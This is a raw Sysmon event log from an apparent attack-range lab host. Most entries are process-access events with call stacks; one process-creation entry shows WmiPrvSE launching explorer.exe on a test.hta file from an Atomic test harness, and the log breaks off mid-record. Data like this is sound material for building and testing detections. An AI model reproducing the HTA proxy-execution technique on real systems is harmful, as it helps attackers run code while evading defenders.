15:59:19.648{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5357-6008-3D06-00000000A301}3032C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023685Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.648{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5357-6008-3D06-00000000A301}3032C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023684Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.632{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5357-6008-3D06-00000000A301}3032C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023683Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.632{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023682Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.632{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023681Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.632{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023680Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.632{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023679Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.632{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5357-6008-3D06-00000000A301}3032C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023678Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3D06-00000000A301}3032C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000023677Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.637{7901BC46-5357-6008-3D06-00000000A301}3032C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEexplorer.exe "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000023676Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3C06-00000000A301}5376C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023675Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3B06-00000000A301}6204C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023674Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3A06-00000000A301}7660C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023673Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023672Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023671Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023670Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023669Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023668Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023667Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023666Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023665Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023664Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023663Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\